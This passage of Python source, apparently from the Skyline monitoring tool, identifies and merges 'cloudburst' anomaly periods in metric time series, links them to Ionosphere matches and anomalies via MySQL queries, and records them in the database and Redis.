last_ts = ts
continue
if ts > (last_ts + resolution):
found_cloudbursts[base_name][start_ts] = {}
found_cloudbursts[base_name][start_ts]['resolution'] = resolution
found_cloudbursts[base_name][start_ts]['full_duration'] = full_duration
found_cloudbursts[base_name][start_ts]['from'] = from_timestamp
found_cloudbursts[base_name][start_ts]['until'] = until_timestamp
found_cloudbursts[base_name][start_ts]['start'] = start_ts
found_cloudbursts[base_name][start_ts]['end'] = last_ts
found_cloudbursts[base_name][start_ts]['duration'] = last_ts - start_ts
# This new timestamp that is more than one step from
# the last_ts defines the start of a new period
start_ts = ts
last_ts = ts
if initial_start_ts == last_ts:
last_ts = initial_start_ts + resolution
found_cloudbursts[base_name][start_ts] = {}
found_cloudbursts[base_name][start_ts]['resolution'] = resolution
found_cloudbursts[base_name][start_ts]['full_duration'] = full_duration
found_cloudbursts[base_name][start_ts]['from'] = from_timestamp
found_cloudbursts[base_name][start_ts]['until'] = until_timestamp
found_cloudbursts[base_name][start_ts]['start'] = start_ts
found_cloudbursts[base_name][start_ts]['end'] = last_ts
found_cloudbursts[base_name][start_ts]['duration'] = last_ts - start_ts
logger.info('cloudburst :: find_cloudbursts :: %s cloudburst periods identified for %s' % (
str(len(found_cloudbursts[base_name])), base_name))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: failed to add %s to found_cloudbursts dict - %s' % (base_name, e))
new_cloudburst_ids = []
known_cloudbursts = {}
matches_in_period = {}
matches_in_period['fp'] = {}
matches_in_period['layer'] = {}
matched_metric_ids = []
found_metric_cloudbursts = {}
period_anomalies = {}
cloudburst_metrics_key_created = False
if len(found_cloudbursts) > 0:
try:
engine, log_msg, trace = get_an_engine()
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: could not get a MySQL engine to update cloudburst table - %s' % e)
if not engine:
logger.error('error :: cloudburst :: find_cloudbursts :: engine not obtained to update cloudburst table')
cloudburst_table = None
try:
cloudburst_table, log_msg, trace = cloudburst_table_meta(skyline_app, engine)
logger.info('cloudburst :: find_cloudbursts :: cloudburst_table OK')
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: failed to get cloudburst_table meta - %s' % e)
cloudburst_table = None
if cloudburst_table is None:
logger.error('error :: cloudburst :: find_cloudbursts :: cloudburst_table not defined')
# @added 20210819 - Feature #4164: luminosity - cloudbursts
# Determine first matched id in period to reduce the
# mysql.handler_read_next count from doing index scans and use
# primary key instead
check_period = now_timestamp - long_period_check_last
first_cloudburst_id_in_period = None
logger.info('cloudburst :: find_cloudbursts :: determining first cloudburst id in period')
try:
connection = engine.connect()
stmt = select([cloudburst_table.c.id]).\
where(cloudburst_table.c.timestamp >= check_period).\
order_by(cloudburst_table.c.id.asc()).limit(1)
result = connection.execute(stmt)
for row in result:
first_cloudburst_id_in_period = row['id']
break
connection.close()
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: could not determine first cloudburst id - %s' % e)
logger.info('cloudburst :: find_cloudbursts :: first cloudburst id in the period is: %s' % (
str(first_cloudburst_id_in_period)))
cloudburst_metrics_key = 'luminosity.cloudburst.metrics.%s' % str(key_reference_timestamp)
new_cloudburst_ids = []
known_cloudbursts = {}
period_cloudbursts = 0
# one_day_ago = now_timestamp - 86400
if first_cloudburst_id_in_period:
try:
connection = engine.connect()
# @modified 20210819 - Feature #4164: luminosity - cloudbursts
# Added end so that the period can be compared
# stmt = select([cloudburst_table.c.metric_id, cloudburst_table.c.timestamp, cloudburst_table.c.end]).\
# @modified 20210819 - Feature #4164: luminosity - cloudbursts
# Reduce the mysql.handler_read_next count from doing
# index scans and use primary key
# stmt = select([cloudburst_table.c.metric_id, cloudburst_table.c.timestamp, cloudburst_table.c.end]).\
# where(cloudburst_table.c.timestamp >= one_day_ago)
stmt = select([cloudburst_table.c.metric_id, cloudburst_table.c.timestamp, cloudburst_table.c.end]).\
where(cloudburst_table.c.id >= first_cloudburst_id_in_period)
result = connection.execute(stmt)
for row in result:
metric_id = row['metric_id']
if metric_id not in list(known_cloudbursts.keys()):
known_cloudbursts[metric_id] = {}
known_timestamp = row['timestamp']
# known_cloudbursts[metric_id][known_timestamp] = metric_id
# @added 20210819 - Feature #4164: luminosity - cloudbursts
known_cloudbursts[metric_id][known_timestamp] = {}
known_cloudbursts[metric_id][known_timestamp][metric_id] = metric_id
known_cloudbursts[metric_id][known_timestamp]['end'] = row['end']
period_cloudbursts += 1
connection.close()
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: could not determine known cloudbursts from the cloudburst table - %s' % e)
logger.info('cloudburst :: find_cloudbursts :: found %s cloudbursts recorded in the DB in the %s seconds period' % (
str(period_cloudbursts), str(long_period_check_last)))
####
# ONLY make the DB queries if there are unknown cloudbursts
for base_name in list(found_cloudbursts.keys()):
# logger.info('cloudburst :: find_cloudbursts :: checking cloudbursts to insert for %s' % base_name)
metric_id = None
try:
metric_id = metric_id_from_base_name(skyline_app, base_name)
except Exception as e:
logger.error('error :: cloudburst :: find_cloudbursts :: failed to get metric id for %s from db: %s' % (base_name, e))
continue
logger.info('cloudburst :: find_cloudbursts :: checking cloudbursts to insert for %s with metric_id: %s' % (
base_name, str(metric_id)))
known_metric_cloudburst_timestamps = []
try:
known_metric_cloudburst_timestamps = list(known_cloudbursts[metric_id].keys())
except KeyError:
known_metric_cloudburst_timestamps = []
except Exception as e:
logger.error('error :: cloudburst :: find_cloudbursts :: failed to determine known_metric_timestamps for %s - %s' % (base_name, e))
too_old = 0
for timestamp in list(found_cloudbursts[base_name].keys()):
try:
if timestamp < (now_timestamp - long_period_check_last):
too_old += 1
continue
if timestamp in known_metric_cloudburst_timestamps:
logger.info('cloudburst :: find_cloudbursts :: known cloudburst - skipping cloudburst at %s for %s' % (
str(timestamp), base_name))
continue
in_known_cloudburst_period = False
for known_metric_cloudburst_timestamp in known_metric_cloudburst_timestamps:
end = known_cloudbursts[metric_id][known_metric_cloudburst_timestamp]['end']
if timestamp >= known_metric_cloudburst_timestamp and timestamp <= end:
logger.info('cloudburst :: find_cloudbursts :: known cloudburst - skipping cloudburst at %s for %s, found in a period of cloudburst starting at %s and ending %s' % (
str(timestamp), base_name,
str(known_metric_cloudburst_timestamp), str(end)))
in_known_cloudburst_period = True
break
if in_known_cloudburst_period:
continue
if base_name not in list(found_metric_cloudbursts.keys()):
found_metric_cloudbursts[base_name] = {}
found_metric_cloudbursts[base_name][timestamp] = found_cloudbursts[base_name][timestamp]
# @modified 20210819 - Feature #4164: luminosity - cloudbursts
# Added end so that the period can be compared
found_metric_cloudbursts[base_name][timestamp]['end'] = found_cloudbursts[base_name][timestamp]['end']
logger.info('cloudburst :: find_cloudbursts :: new cloudburst found for %s: %s' % (
base_name, str(found_metric_cloudbursts[base_name][timestamp])))
except Exception as err:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: failed to determine if known cloudburst for %s - %s' % (base_name, err))
if base_name not in list(found_metric_cloudbursts.keys()):
logger.info('cloudburst :: find_cloudbursts :: all identified cloudbursts for %s are known and %s are too old' % (
base_name, str(too_old)))
else:
logger.info('cloudburst :: find_cloudbursts :: %s new cloudbursts for %s are not known' % (
str(len(list(found_metric_cloudbursts[base_name].keys()))), base_name))
# Consolidate back to back periods
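# When an identified cloudburst starts within the start/end period of
# another cloudburst for the same metric the two are merged: the one
# that starts inside keeps the later end (and a recalculated duration)
# and the overlapping entry is discarded so that a single record
# describes the event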
if len(found_metric_cloudbursts) > 0:
for base_name in list(found_metric_cloudbursts.keys()):
cloudburst_tss = sorted(list(found_metric_cloudbursts[base_name].keys()))
merged = []
for c_index, cloudburst_ts in enumerate(cloudburst_tss):
if c_index == 0:
continue
if cloudburst_ts in merged:
continue
for c2_index, c_ts in enumerate(cloudburst_tss):
# if c2_index == 0:
# continue
if c_ts in merged:
continue
if c2_index == c_index:
continue
merge = False
c_start = found_metric_cloudbursts[base_name][c_ts]['start']
c_end = found_metric_cloudbursts[base_name][c_ts]['end']
if cloudburst_ts >= c_start and cloudburst_ts <= c_end:
logger.info('%s falls within period of (%s, %s)' % (str(cloudburst_ts), str(c_start), str(c_end)))
ts_list = [ts for c_i, ts in enumerate(cloudburst_tss) if c_i == c2_index]
ts = ts_list[0]
# start = found_metric_cloudbursts[base_name][c_ts]['start']
end = found_metric_cloudbursts[base_name][c_ts]['end']
if end > found_metric_cloudbursts[base_name][cloudburst_ts]['end']:
logger.info('merging %s with %s' % (
str(found_metric_cloudbursts[base_name][ts]),
str(found_metric_cloudbursts[base_name][cloudburst_ts])))
new_end = found_metric_cloudbursts[base_name][c_ts]['end']
found_metric_cloudbursts[base_name][cloudburst_ts]['end'] = new_end
found_metric_cloudbursts[base_name][cloudburst_ts]['duration'] = new_end - cloudburst_ts
merge = True
if merge:
del found_metric_cloudbursts[base_name][c_ts]
merged.append(c_ts)
if len(found_metric_cloudbursts) > 0:
# Determine what Ionosphere matches occurred in the cloudburst
# period
# SELECT id,layer_id,fp_id,metric_id,anomaly_timestamp FROM ionosphere_layers_matched WHERE anomaly_timestamp > (now_timestamp - long_period_check_last)
# SELECT id,fp_id,metric_timestamp FROM ionosphere_matched WHERE metric_timestamp > (now_timestamp - long_period_check_last)
newer_than_timestamp = now_timestamp - long_period_check_last
ionosphere_matched_table = None
try:
ionosphere_matched_table, log_msg, trace = ionosphere_matched_table_meta(skyline_app, engine)
logger.info('cloudburst :: find_cloudbursts :: ionosphere_matched_table OK')
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: failed to get ionosphere_matched_table meta - %s' % e)
ionosphere_matched_table = None
# @modified 20210819 - Feature #4164: luminosity - cloudbursts
# Reduce the mysql.handler_read_next count from doing index scans
# when the query uses metric_timestamp >= newer_than_timestamp, by
# first identifying the firsted matched id in the period and then
# basing the query on id >= first_matched_id_in_period, reduces the
# handler_read_next from 242561
# EXPLAIN SELECT ionosphere_matched.id, ionosphere_matched.fp_id, ionosphere_matched.metric_timestamp
# FROM ionosphere_matched
# WHERE ionosphere_matched.metric_timestamp >= 1629272047"
# +------+-------------+--------------------+-------+---------------+--------------------------+---------+------+--------+--------------------------+
# | id | select_type | table | type | possible_keys | key | key_len | ref | rows | Extra |
# +------+-------------+--------------------+-------+---------------+--------------------------+---------+------+--------+--------------------------+
# | 1 | SIMPLE | ionosphere_matched | index | NULL | features_profile_matched | 13 | NULL | 242561 | Using where; Using index |
# +------+-------------+--------------------+-------+---------------+--------------------------+---------+------+--------+--------------------------+
# to 339
# "EXPLAIN SELECT id FROM ionosphere_matched WHERE metric_timestamp >= 1629272047 ORDER BY id ASC LIMIT 1"
# +------+-------------+--------------------+-------+---------------+---------+---------+------+------+-------------+
# | id | select_type | table | type | possible_keys | key | key_len | ref | rows | Extra |
# +------+-------------+--------------------+-------+---------------+---------+---------+------+------+-------------+
# | 1 | SIMPLE | ionosphere_matched | index | NULL | PRIMARY | 4 | NULL | 1 | Using where |
# +------+-------------+--------------------+-------+---------------+---------+---------+------+------+-------------+
# "SELECT id FROM ionosphere_matched WHERE metric_timestamp >= 1629272047 ORDER BY id ASC LIMIT 1"
# +--------+
# | id |
# +--------+
# | 249655 |
# +--------+
# "EXPLAIN SELECT ionosphere_matched.id, ionosphere_matched.fp_id, ionosphere_matched.metric_timestamp
# FROM ionosphere_matched
# WHERE ionosphere_matched.id >= 249655"
# +------+-------------+--------------------+-------+----------------------------------+--------------------------+---------+------+------+--------------------------+
# | id | select_type | table | type | possible_keys | key | key_len | ref | rows | Extra |
# +------+-------------+--------------------+-------+----------------------------------+--------------------------+---------+------+------+--------------------------+
# | 1 | SIMPLE | ionosphere_matched | range | PRIMARY,features_profile_matched | features_profile_matched | 4 | NULL | 338 | Using where; Using index |
# +------+-------------+--------------------+-------+----------------------------------+--------------------------+---------+------+------+--------------------------+
# Determine first matched id in period
first_matched_id_in_period = None
logger.info('cloudburst :: find_cloudbursts :: determining first ionosphere match id in period')
try:
connection = engine.connect()
stmt = select([ionosphere_matched_table.c.id]).\
where(ionosphere_matched_table.c.metric_timestamp >= newer_than_timestamp).\
order_by(ionosphere_matched_table.c.id.asc()).limit(1)
result = connection.execute(stmt)
for row in result:
first_matched_id_in_period = row['id']
break
connection.close()
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: could not determine first ionosphere match id - %s' % e)
logger.info('cloudburst :: find_cloudbursts :: the first fp match id for the period is %s' % (
str(first_matched_id_in_period)))
if first_matched_id_in_period:
logger.info('cloudburst :: find_cloudbursts :: determining ionosphere matches in period')
try:
connection = engine.connect()
# @modified 20210819 - Feature #4164: luminosity - cloudbursts
# Reduce the mysql.handler_read_next count from doing
# index scans and use primary key
# stmt = select([ionosphere_matched_table.c.id, ionosphere_matched_table.c.fp_id, ionosphere_matched_table.c.metric_timestamp]).\
# where(ionosphere_matched_table.c.metric_timestamp >= newer_than_timestamp)
stmt = select([ionosphere_matched_table.c.id, ionosphere_matched_table.c.fp_id, ionosphere_matched_table.c.metric_timestamp]).\
where(ionosphere_matched_table.c.id >= first_matched_id_in_period)
result = connection.execute(stmt)
for row in result:
match_id = row['id']
matches_in_period['fp'][match_id] = {}
matches_in_period['fp'][match_id]['fp_id'] = row['fp_id']
matches_in_period['fp'][match_id]['timestamp'] = row['metric_timestamp']
connection.close()
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: could not determine ionosphere matches - %s' % e)
logger.info('cloudburst :: find_cloudbursts :: %s Ionosphere fp matches recorded in the DB for the period' % (
str(len(list(matches_in_period['fp'].keys())))))
ionosphere_layers_matched_table = None
try:
ionosphere_layers_matched_table, log_msg, trace = ionosphere_layers_matched_table_meta(skyline_app, engine)
logger.info('cloudburst :: find_cloudbursts :: ionosphere_layers_matched_table OK')
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: failed to get ionosphere_layers_matched_table meta - %s' % e)
ionosphere_layers_matched_table = None
# @added 20210819 - Feature #4164: luminosity - cloudbursts
# Determine first matched id in period to reduce the
# mysql.handler_read_next count from doing index scans and use
# primary key instead
first_layers_matched_id_in_period = None
logger.info('cloudburst :: find_cloudbursts :: determining first ionosphere layers match id in period')
try:
connection = engine.connect()
stmt = select([ionosphere_layers_matched_table.c.id]).\
where(ionosphere_layers_matched_table.c.anomaly_timestamp >= newer_than_timestamp).\
order_by(ionosphere_layers_matched_table.c.id.asc()).limit(1)
result = connection.execute(stmt)
for row in result:
first_layers_matched_id_in_period = row['id']
break
connection.close()
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: could not determine first ionosphere match id - %s' % e)
logger.info('cloudburst :: find_cloudbursts :: first ionosphere layers match id in the period is: %s' % (
str(first_layers_matched_id_in_period)))
if first_layers_matched_id_in_period:
try:
connection = engine.connect()
# @modified 20210819 - Feature #4164: luminosity - cloudbursts
# Reduce the mysql.handler_read_next count from doing
# index scans and use primary key
# stmt = select([ionosphere_layers_matched_table.c.id, ionosphere_layers_matched_table.c.layer_id, ionosphere_layers_matched_table.c.fp_id, ionosphere_layers_matched_table.c.metric_id, ionosphere_layers_matched_table.c.anomaly_timestamp]).\
# where(ionosphere_layers_matched_table.c.anomaly_timestamp >= newer_than_timestamp)
stmt = select([ionosphere_layers_matched_table.c.id, ionosphere_layers_matched_table.c.layer_id, ionosphere_layers_matched_table.c.fp_id, ionosphere_layers_matched_table.c.metric_id, ionosphere_layers_matched_table.c.anomaly_timestamp]).\
where(ionosphere_layers_matched_table.c.id >= first_layers_matched_id_in_period)
result = connection.execute(stmt)
for row in result:
match_id = row['id']
matches_in_period['layer'][match_id] = {}
matches_in_period['layer'][match_id]['match_id'] = match_id
matches_in_period['layer'][match_id]['layer_id'] = row['layer_id']
matches_in_period['layer'][match_id]['fp_id'] = row['fp_id']
matches_in_period['layer'][match_id]['metric_id'] = row['metric_id']
matches_in_period['layer'][match_id]['timestamp'] = row['anomaly_timestamp']
connection.close()
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: could not determine ionosphere layers matches - %s' % e)
logger.info('cloudburst :: find_cloudbursts :: %s Ionosphere layers matches recorded in the DB for the period' % (
str(len(list(matches_in_period['layer'].keys())))))
# matched_metric_ids = []
for layer_match_id in list(matches_in_period['layer'].keys()):
matched_metric_ids.append(matches_in_period['layer'][layer_match_id]['metric_id'])
# Determine metric_id from the ionosphere table from fps of matches
# but these are expensive queries, maybe not so much with IN
ionosphere_table = None
try:
ionosphere_table, log_msg, trace = ionosphere_table_meta(skyline_app, engine)
logger.info('cloudburst :: find_cloudbursts :: ionosphere_table OK')
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: failed to get ionosphere_table meta - %s' % e)
ionosphere_table = None
fp_metric_ids_list = []
for match_id in list(matches_in_period['fp'].keys()):
# SELECT metric_id FROM
metric_id = None
fp_id = matches_in_period['fp'][match_id]['fp_id']
try:
connection = engine.connect()
stmt = select([ionosphere_table.c.metric_id]).\
where(ionosphere_table.c.id == fp_id)
result = connection.execute(stmt)
for row in result:
metric_id = row['metric_id']
matches_in_period['fp'][match_id]['metric_id'] = metric_id
fp_metric_ids_list.append(metric_id)
connection.close()
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: could not determine metric_id from ionosphere - %s' % e)
fp_metric_ids_list = list(set(fp_metric_ids_list))
if fp_metric_ids_list:
matched_metric_ids = matched_metric_ids + fp_metric_ids_list
matched_metric_ids = list(set(matched_metric_ids))
anomalies_table = None
try:
anomalies_table, log_msg, trace = anomalies_table_meta(skyline_app, engine)
logger.info('cloudburst :: find_cloudbursts :: anomalies_table OK')
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: failed to get anomalies_table meta - %s' % e)
anomalies_table = None
# @added 20210819 - Feature #4164: luminosity - cloudbursts
# Determine first anomaly id in period to reduce the
# mysql.handler_read_next count from doing index scans and use
# primary key instead
first_anomaly_id_in_period = None
logger.info('cloudburst :: find_cloudbursts :: determining first anomaly id in period')
try:
connection = engine.connect()
stmt = select([anomalies_table.c.id]).\
where(anomalies_table.c.anomaly_timestamp >= newer_than_timestamp).\
order_by(anomalies_table.c.id.asc()).limit(1)
result = connection.execute(stmt)
for row in result:
first_anomaly_id_in_period = row['id']
break
connection.close()
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: could not determine first anomaly id - %s' % e)
logger.info('cloudburst :: find_cloudbursts :: first anomaly id in the period is: %s' % (
str(first_anomaly_id_in_period)))
anomaly_id = None
period_anomalies = {}
if first_anomaly_id_in_period:
try:
connection = engine.connect()
# @modified 20210819 - Feature #4164: luminosity - cloudbursts
# Reduce the mysql.handler_read_next count from doing
# index scans and use primary key
# stmt = select([anomalies_table.c.id, anomalies_table.c.metric_id, anomalies_table.c.anomaly_timestamp, ]).\
# where(anomalies_table.c.anomaly_timestamp >= newer_than_timestamp)
stmt = select([anomalies_table.c.id, anomalies_table.c.metric_id, anomalies_table.c.anomaly_timestamp, ]).\
where(anomalies_table.c.id >= first_anomaly_id_in_period)
result = connection.execute(stmt)
for row in result:
metric_id = row['metric_id']
if metric_id not in list(period_anomalies.keys()):
period_anomalies[metric_id] = {}
anomaly_id = int(row['id'])
anomaly_timestamp = row['anomaly_timestamp']
period_anomalies[metric_id][anomaly_timestamp] = {}
period_anomalies[metric_id][anomaly_timestamp]['id'] = anomaly_id
connection.close()
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: could not determine anomalies in the period - %s' % e)
logger.info('cloudburst :: find_cloudbursts :: %s anomalies found in the period' % str(len(period_anomalies)))
found_cloudbursts_to_add = {}
# cloudburst_metrics_key = 'luminosity.cloudburst.metrics.%s' % str(key_reference_timestamp)
# for base_name in list(found_cloudbursts.keys()):
for base_name in list(found_metric_cloudbursts.keys()):
metric_id = None
try:
metric_id = metric_id_from_base_name(skyline_app, base_name)
except Exception as e:
logger.error('error :: cloudburst :: find_cloudbursts :: failed to get metric id for %s from db: %s' % (base_name, e))
continue
logger.info('cloudburst :: find_cloudbursts :: checking anomalies and matches in period for %s with metric_id: %s' % (
base_name, str(metric_id)))
# Extract the matches for the metric and create a dictionary
# based on the match timestamp not the match id. Although there
# are both fp and layer matches they will never have the same
# timestamp because only a fp or a layer can match a potential
# anomaly, not both.
metric_matches = {}
if metric_id in matched_metric_ids:
for match_type in list(matches_in_period.keys()):
for match_id in list(matches_in_period[match_type].keys()):
try:
if metric_id == matches_in_period[match_type][match_id]['metric_id']:
if base_name not in list(metric_matches.keys()):
metric_matches[base_name] = {}
match_timestamp = matches_in_period[match_type][match_id]['timestamp']
metric_matches[base_name][match_timestamp] = matches_in_period[match_type][match_id]
metric_matches[base_name][match_timestamp]['match_type'] = match_type
metric_matches[base_name][match_timestamp]['match_id'] = match_id
except Exception as e:
logger.error('error :: cloudburst :: find_cloudbursts :: failed to populate metric_matches for %s - %s' % (base_name, e))
# Sort by end timestamps?
for cloudburst_ts in list(found_metric_cloudbursts[base_name].keys()):
cloudburst_ts_range = list(range((cloudburst_ts - resolution), (cloudburst_ts + resolution)))
try:
found_metric_cloudbursts[base_name][cloudburst_ts]['match_id'] = 0
found_metric_cloudbursts[base_name][cloudburst_ts]['fp_id'] = 0
found_metric_cloudbursts[base_name][cloudburst_ts]['layer_id'] = 0
found_metric_cloudbursts[base_name][cloudburst_ts]['anomaly_id'] = 0
metric_matches_present = 0
try:
metric_matches_present = len(list(metric_matches[base_name].keys()))
except KeyError:
metric_matches_present = 0
except Exception as e:
logger.error('error :: cloudburst :: find_cloudbursts :: failed to determine if there are matches for %s - %s' % (base_name, e))
if metric_matches_present:
for matched_ts in list(metric_matches[base_name].keys()):
# if matched_ts == cloudburst_ts:
if matched_ts in cloudburst_ts_range:
match_id = metric_matches[base_name][matched_ts]['match_id']
found_metric_cloudbursts[base_name][cloudburst_ts]['match_id'] = match_id
match_type = metric_matches[base_name][matched_ts]['match_type']
found_metric_cloudbursts[base_name][cloudburst_ts]['fp_id'] = metric_matches[base_name][matched_ts]['fp_id']
if match_type == 'layer':
found_metric_cloudbursts[base_name][cloudburst_ts]['layer_id'] = metric_matches[base_name][matched_ts]['layer_id']
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: failed to populate found_metric_cloudbursts for %s - %s' % (base_name, e))
anomaly_id = None
# Use the period_anomalies single query rather than a query for
# every cloudburst timestamp which index scans the anomalies
# table and results in 700K mysql.handler_read_next operations,
# Skyline eating its own performance monitoring dog food.
# try:
# connection = engine.connect()
# stmt = select([anomalies_table.c.id]).\
# where(anomalies_table.c.anomaly_timestamp == cloudburst_ts).\
# where(anomalies_table.c.metric_id == metric_id)
# result = connection.execute(stmt)
# for row in result:
# anomaly_id = int(row['id'])
# connection.close()
cloudburst_ts_range_start = cloudburst_ts - resolution
cloudburst_ts_range_end = cloudburst_ts + resolution
cloudburst_ts_range = list(range(cloudburst_ts_range_start, cloudburst_ts_range_end))
try:
if metric_id in list(period_anomalies.keys()):
for anomaly_timestamp in list(period_anomalies[metric_id].keys()):
if anomaly_timestamp in cloudburst_ts_range:
try:
anomaly_id = period_anomalies[metric_id][anomaly_timestamp]['id']
if isinstance(anomaly_id, int):
break
except KeyError:
logger.warning('warning :: cloudburst :: find_cloudbursts :: due to KeyError in period_anomalies[%s][%s] could not determine anomaly_id in cloudburst_ts_range (%s, %s) for %s with metric_id %s from period_anomalies: %s' % (
str(metric_id), str(anomaly_timestamp),
str(cloudburst_ts_range_start),
str(cloudburst_ts_range_end), base_name,
str(metric_id),
str(period_anomalies[metric_id])))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: could not determine anomaly_id in cloudburst_ts_range (%s, %s) for %s with metric_id %s from period_anomalies: %s - %s' % (
str(cloudburst_ts_range_start),
str(cloudburst_ts_range_end), base_name,
str(metric_id),
str(period_anomalies[metric_id]), e))
if isinstance(anomaly_id, int):
found_metric_cloudbursts[base_name][cloudburst_ts]['anomaly_id'] = anomaly_id
if base_name not in list(found_cloudbursts_to_add.keys()):
found_cloudbursts_to_add[base_name] = {}
# This ensures that the longest cloudburst for the timestamp
# will be recorded because multiple cloudburst anomalies
# can be identified for a period but we only want to record
# one, the last one for each timestamp, for example if this
# is not done it results in:
# +----+-----------+------------+------------+----------+----------------+------------+---------------+------------+----------+-------+----------+
# | id | metric_id | timestamp | end | duration | from_timestamp | resolution | full_duration | anomaly_id | match_id | fp_id | layer_id |
# +----+-----------+------------+------------+----------+----------------+------------+---------------+------------+----------+-------+----------+
# | 87 | 1099 | 1628600400 | 1628171100 | 2700 | 1628068572 | 900 | 604800 | 0 | 0 | 0 | 0 |
# | 88 | 1099 | 1628600400 | 1628343900 | 3600 | 1628068572 | 900 | 604800 | 0 | 0 | 0 | 0 |
# +----+-----------+------------+------------+----------+----------------+------------+---------------+------------+----------+-------+----------+
# Here a cloudburst was identified at 1628600400
found_cloudbursts_to_add[base_name][cloudburst_ts] = found_metric_cloudbursts[base_name][cloudburst_ts]
# BREAK OUT HERE - before inserting into DB - testing
# continue
logger.info('cloudburst :: find_cloudbursts :: %s found_cloudbursts_to_add' % (
str(len(found_cloudbursts_to_add))))
db_added_at = int(time())
for base_name in list(found_cloudbursts_to_add.keys()):
# Sort by newest timestamps first
# cloudburst_tss = sorted(list(found_cloudbursts_to_add[base_name].keys()), reverse=True)
cloudburst_tss = sorted(list(found_cloudbursts_to_add[base_name].keys()))
for cloudburst_ts in cloudburst_tss:
# if cloudburst_ts > (now_timestamp - custom_check_last):
if cloudburst_ts < (now_timestamp - long_period_check_last):
continue
ts_added_for = 0
try:
ts_added_for = known_cloudbursts[metric_id][cloudburst_ts]
except KeyError:
ts_added_for = 0
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: could not determine if cloudburst_ts was added to known_cloudbursts[metric_id][cloudburst_ts] - %s' % e)
ts_added_for = 0
if ts_added_for:
logger.info('cloudburst :: find_cloudbursts :: cloudburst at %s for %s is present in known_cloudbursts not adding to the DB' % (
str(cloudburst_ts), base_name))
continue
# Do not just check the timestamp, check to see if the cloudburst_ts
# falls between timestamp and end.
# So preprocess all the cloudbursts for a metric pre insertion,
# combining cloudbursts that are next to each other and those
# which overlap. These detections describe the same event, only
# the event, when detected in the next 5 minute run, could be
# described differently because it is being described from a
# different dataset, one which starts and ends 5 minutes later.
new_cloudburst_id = None
try:
logger.info('cloudburst :: find_cloudbursts :: inserting cloudburst at %s for %s' % (
str(cloudburst_ts), base_name))
end_ts = found_cloudbursts_to_add[base_name][cloudburst_ts]['end']
from_ts = found_cloudbursts_to_add[base_name][cloudburst_ts]['from']
duration = found_cloudbursts_to_add[base_name][cloudburst_ts]['duration']
resolution = found_cloudbursts_to_add[base_name][cloudburst_ts]['resolution']
full_duration = found_cloudbursts_to_add[base_name][cloudburst_ts]['full_duration']
match_id = found_cloudbursts_to_add[base_name][cloudburst_ts]['match_id']
fp_id = found_cloudbursts_to_add[base_name][cloudburst_ts]['fp_id']
layer_id = found_cloudbursts_to_add[base_name][cloudburst_ts]['layer_id']
anomaly_id = found_cloudbursts_to_add[base_name][cloudburst_ts]['anomaly_id']
connection = engine.connect()
ins = cloudburst_table.insert().values(
metric_id=metric_id,
timestamp=cloudburst_ts, end=end_ts, duration=duration,
from_timestamp=from_ts, resolution=resolution,
full_duration=full_duration, match_id=match_id,
fp_id=fp_id, layer_id=layer_id,
anomaly_id=anomaly_id, added_at=db_added_at)
result = connection.execute(ins)
new_cloudburst_id = result.inserted_primary_key[0]
new_cloudburst_ids.append(new_cloudburst_id)
connection.close()
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: could not insert cloudburst record into DB for %s: %s - %s' % (
base_name, str(found_cloudbursts_to_add[base_name][cloudburst_ts]), e))
if new_cloudburst_id:
try:
self.redis_conn.hset(cloudburst_metrics_key, base_name, str(found_cloudbursts_to_add[base_name][cloudburst_ts]))
self.redis_conn.expire(cloudburst_metrics_key, 604800)
cloudburst_metrics_key_created = True
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: failed to add to %s Redis hash key - %s' % (
cloudburst_metrics_key, e))
# Add it to the known_cloudbursts dict
if metric_id not in list(known_cloudbursts.keys()):
known_cloudbursts[metric_id] = {}
known_cloudbursts[metric_id][cloudburst_ts] = metric_id
# Add both short_period and long_period timestamp keys to
# the luminosity.cloudburst.processed.anomalies Redis hash
# key so that the timestamps identified in later short_period
# analysis can be looked up and skipped if already processed
# rather than sent through to the second stage to improve
# efficiency.
processed_timestamps = []
try:
short_period_anomalies = m66_candidate_metrics[base_name][custom_algorithm]['anomalies']
processed_timestamps = [int(ts) for ts, value in short_period_anomalies]
long_period_anomalies = second_stage_m66_candidate_metrics[base_name][custom_algorithm]['anomalies']
long_period_processed_timestamps = [int(ts) for ts, value in long_period_anomalies]
processed_timestamps = processed_timestamps + long_period_processed_timestamps
processed_timestamps = list(set(processed_timestamps))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: failed to determine processed_timestamps for %s - %s' % (
base_name, e))
for processed_timestamp in processed_timestamps:
try:
key_data = {'cloudburst_id': new_cloudburst_id, 'processed_at': now_timestamp}
